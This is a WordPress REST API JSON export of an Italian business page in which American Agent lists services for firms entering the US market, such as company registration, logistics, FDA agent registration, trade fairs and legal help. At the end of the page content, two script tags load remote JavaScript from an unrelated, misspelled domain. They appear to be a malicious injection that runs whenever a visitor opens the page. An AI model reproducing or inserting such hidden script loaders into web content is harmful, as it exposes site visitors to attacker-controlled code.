{"id":3133,"date":"2014-08-16T07:17:42","date_gmt":"2014-08-16T07:17:42","guid":{"rendered":"https:\/\/americanagent.com\/usa-business-support-services-2\/"},"modified":"2014-09-09T15:25:20","modified_gmt":"2014-09-09T19:25:20","slug":"servizi-di-supporto-mercato-americano","status":"publish","type":"page","link":"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/","title":{"rendered":"Servizi di Supporto Mercato Americano"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-f7fb1752f3e8ee49b61cd3edcb2ef68a\">\n#top .av-special-heading.av-av_heading-f7fb1752f3e8ee49b61cd3edcb2ef68a{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-f7fb1752f3e8ee49b61cd3edcb2ef68a .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-f7fb1752f3e8ee49b61cd3edcb2ef68a .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-f7fb1752f3e8ee49b61cd3edcb2ef68a av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Servizi di Supporto &#8211; Mercato Americano<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-9bf41aaed25fc1620a8ae3a04c1f84c1 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><span lang=\"IT\" style=\"font-family: 'inherit','serif';\"><span style=\"color: #000000; font-size: medium;\">Spesso ci sono alcuni servizi importanti richiesti per <\/span><span style=\"font-size: medium;\">consolidare la presenza della tua societ\u00e0 sul mercato americano<\/span><span style=\"color: #000000; font-size: medium;\">. <\/span><span style=\"font-size: medium;\">Offriamo risorse per piccole e medie imprese<\/span><span style=\"font-size: medium;\"> e possiamo aiutarti a <\/span><span style=\"font-size: medium;\">esportare<\/span><span style=\"font-size: medium;\"> e a <\/span><span style=\"font-size: medium;\">vendere sul territorio americano<\/span><span style=\"font-size: medium;\">.<\/span> <span style=\"font-size: medium;\">La lista qua sotto riflette alcuni dei servizi che dovresti prendere in considerazione.<\/span><span style=\"color: #000000; font-size: medium;\"> Questi servizi sono offerti da una rete di partner con cui abbiamo lavorato in passato.<\/span><\/span><\/p>\n<p><span lang=\"IT\" style=\"font-family: 'inherit','serif';\"><span style=\"color: #000000; font-size: medium;\">Molti di questi partner hanno gi\u00e0 lavorato insieme. Conoscendo gi\u00e0 il processo e le altre persone coinvolte, il risultato \u00e8 avere una situazione pi\u00f9 vantaggiosa economicamente e un processo di comunicazione accelerato.<\/span><\/span><\/p>\n<p><span lang=\"IT\" style=\"font-family: 'inherit','serif';\"><span style=\"color: #000000; font-size: medium;\">La lista qui sotto serve solo come presentazione di alcuni dei servizi che siamo in grado di orchestrare per tuo conto qui negli Stati Uniti.<\/span><\/span><\/p>\n<\/div><\/section><br \/>\n<div  class='avia-icon-list-container av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6  avia-builder-el-3  el_after_av_textblock  avia-builder-el-last '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e4a0ebdf966f1bea8883e87bb95dffd6 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-72712af574a7da93b5ec436a4af747d1 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Registrazione negli USA (come Inc. o LLC). \"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Registrazione negli USA (come Inc. o LLC). <\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-0b72c4b2324d6a16abf1d46f8f066357 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Questioni bancarie.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Questioni bancarie.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Fatturazione, contabilit\u00e0, esenzioni e gestione delle tasse a cura di note e affidabili compagnie partner di Chicago.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-46d3f0828cb36e9a9fcb04a5d1514a95 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Ufficio in America.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Ufficio in America.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Indirizzo personale dedicato, numero di telefono con servizio di risposta, ottimo per servizio clienti locale e per offrire presenza negli USA.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-1e69210cf70bac89075f6eb7122fabb5 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Stoccaggio e conservazione prodotti (anche in congelatore).\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Stoccaggio e conservazione prodotti (anche in congelatore).<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Logistica, distribuzione di prodotti su tutto il territorio nazionale.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-9ae37212451d3e79c50fc49438010f24 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Programmi di garanzia e restituzione prodotti.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Programmi di garanzia e restituzione prodotti.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-89e3cb44ed85fdfa32d23dfe189da4a3 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Registrazione FDA\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Registrazione FDA<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>American Agent \u00e8 gi\u00e0 registrata come \u201clocal agent\u201d presso la FDA (U.S. Food and Drug Administration)<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-f0b99392216d1b1de5c8858fbf56a8e7 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Gestione della partecipazione alle fiere.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Gestione della partecipazione alle fiere.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p>Iscrizione, marketing pre-fiera, organizzazione del vestiario, spedizioni, interpreti, ricerca di personale extra laddove\u00a0necessario.<\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-c109e7522a27409eaf81d4e7602bbecf avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Marketing \"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Marketing <\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p><span lang=\"IT\"><span style=\"color: #000000; font-family: Times New Roman; font-size: medium;\">Siti web locali, traduzioni, brochures, cataloghi, stampe locali e materiale pubblicitario<\/span><\/span><\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-222a08fa79e73a4e55cc4bac39bf962d avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Legali americani.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Legali americani.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p><span lang=\"IT\"><span style=\"color: #000000; font-family: Times New Roman; font-size: medium;\">Per la revisione di contratti con distributori, rappresentanti, clienti, partner. Gestione di qualsiasi situazione che richieda attenzione legale<\/span><\/span><\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-7506929ccce9bfb3d46904b740051567 avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue812' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Recupero crediti. \"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Recupero crediti. <\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<li><div class='iconlist_icon av-av_iconlist_item-8c50d7a18fa54dd24af69676f5fdba0f avia-font-entypo-fontello avia-iconfont avia-font-entypo-fontello'><span class='av-icon-char' data-av_icon='\ue800' data-av_iconfont='entypo-fontello' aria-hidden=\"true\"><\/span><\/div><article class=\"article-icon-entry av-iconlist-empty\"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\" aria-label=\"Icona: Controllo delle attivit\u00e0 dei potenziali partner.\"><h4 class='av_iconlist_title iconlist_title  '  itemprop=\"headline\" >Controllo delle attivit\u00e0 dei potenziali partner.<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":4,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3133","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - Mercato Americano - Servizi di Support<\/title>\n<meta name=\"description\" content=\"Ufficio in America, Logistica USA, distribuzione di prodotti, registrazione FDA, Legali Americani - contratti con distributori, rappresentanti, clienti,\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - Mercato Americano - Servizi di Support\" \/>\n<meta property=\"og:description\" content=\"Ufficio in America, Logistica USA, distribuzione di prodotti, registrazione FDA, Legali Americani - contratti con distributori, rappresentanti, clienti,\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-09T19:25:20+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/servizi-di-supporto-mercato-americano\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/it\\\/servizi-di-supporto-mercato-americano\\\/\",\"name\":\"American Agent - Mercato Americano - Servizi di Support\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:42+00:00\",\"dateModified\":\"2014-09-09T19:25:20+00:00\",\"description\":\"Ufficio in America, Logistica USA, distribuzione di prodotti, registrazione FDA, Legali Americani - contratti con distributori, rappresentanti, clienti,\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/servizi-di-supporto-mercato-americano\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/it\\\/servizi-di-supporto-mercato-americano\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/servizi-di-supporto-mercato-americano\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Servizi di Supporto Mercato Americano\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/it\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - Mercato Americano - Servizi di Support","description":"Ufficio in America, Logistica USA, distribuzione di prodotti, registrazione FDA, Legali Americani - contratti con distributori, rappresentanti, clienti,","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/","og_locale":"it_IT","og_type":"article","og_title":"American Agent - Mercato Americano - Servizi di Support","og_description":"Ufficio in America, Logistica USA, distribuzione di prodotti, registrazione FDA, Legali Americani - contratti con distributori, rappresentanti, clienti,","og_url":"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-09T19:25:20+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/","url":"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/","name":"American Agent - Mercato Americano - Servizi di Support","isPartOf":{"@id":"https:\/\/americanagent.com\/it\/#website"},"datePublished":"2014-08-16T07:17:42+00:00","dateModified":"2014-09-09T19:25:20+00:00","description":"Ufficio in America, Logistica USA, distribuzione di prodotti, registrazione FDA, Legali Americani - contratti con distributori, rappresentanti, clienti,","breadcrumb":{"@id":"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/it\/servizi-di-supporto-mercato-americano\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/it\/"},{"@type":"ListItem","position":2,"name":"Servizi di Supporto Mercato Americano"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/it\/#website","url":"https:\/\/americanagent.com\/it\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages\/3133","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/comments?post=3133"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages\/3133\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/media?parent=3133"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}